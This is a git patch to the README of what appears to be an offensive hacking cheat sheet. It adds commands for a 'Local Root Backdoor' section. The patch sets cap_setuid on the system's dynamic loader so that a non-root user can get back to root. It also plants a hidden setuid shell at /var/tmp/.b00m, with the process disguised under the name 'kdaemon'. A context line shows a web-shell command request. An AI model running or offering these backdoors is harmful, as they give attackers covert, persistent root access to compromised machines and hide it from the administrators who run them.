From e80e13c572fd2c2dfd97dd2809592931d6bc4918 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 16 Jul 2024 22:24:10 +0100
Subject: [PATCH] Update README.md
---
README.md | 20 ++++++++++++++++----
1 file changed, 16 insertions(+), 4 deletions(-)
diff --git a/README.md b/README.md
index 4f6306e..66b1b11 100644
--- a/README.md
+++ b/README.md
@@ -1626,18 +1626,30 @@ curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id"
**6.v. Local Root Backdoor**
-Stay root once you got root
+***1. Backdooring the dynamic loader with setcap
+
```bash
+### Execute as ROOT user
fn="$(readlink -f /lib64/ld-*.so.*)" || fn="$(readlink -f /lib/ld-*.so.*)" || fn="/lib/ld-linux.so.2"
setcap cap_setuid+ep "${fn}"
```
-Become root
+
```bash
-### Execute as non-root user
+### Execute as non-root user to get root
fn="$(readlink -f /lib64/ld-*.so.*)" || fn="$(readlink -f /lib/ld-*.so.*)" || fn="/lib/ld-linux.so.2"
p="python"
command -v python3 >/dev/null && p="python3"
-exec "${fn:?}" "$p" -c 'import os;os.setuid(0);os.execlp("bash", "kdaemon")'
+exec "${fn:?}" "$p" -c 'import os;os.setgid(0);os.setuid(0);os.execlp("bash", "kdaemon")'
+```
+
+***2. Good old b00m shell
+
+```shell
+{ cp /bin/sh /var/tmp/.b00m; chmod 6775 /var/tmp/.b00m; } 2>/dev/null >/dev/null
+```
+
+```shell
+exec /var/tmp/.b00m -p -c 'exec python -c "import os;os.setgid(0);os.setuid(0);os.execlp(\"bash\", \"kdaemon\")"'
```